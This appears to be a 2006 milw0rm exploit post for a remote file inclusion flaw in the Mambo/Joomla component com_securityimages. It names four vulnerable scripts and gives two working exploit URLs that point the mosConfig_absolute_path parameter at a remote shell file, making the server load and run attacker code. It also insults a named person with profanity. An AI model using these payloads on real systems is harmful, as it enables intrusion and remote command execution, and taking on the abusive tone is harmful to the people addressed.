# http://forge.joomla.org/sf/projects/com_securityimages ##### Marckusbest is the Best lamah of irc, fuck you ########## com_securityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug Found by: Drago84 greetz: Exclusive Security This bug allows a remote atacker to execute commands via rfi page: client.php configinsert.php lang.php server.php expl: http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt ########## MarckusBest Fottiti ############################# # milw0rm.com [2006-07-28]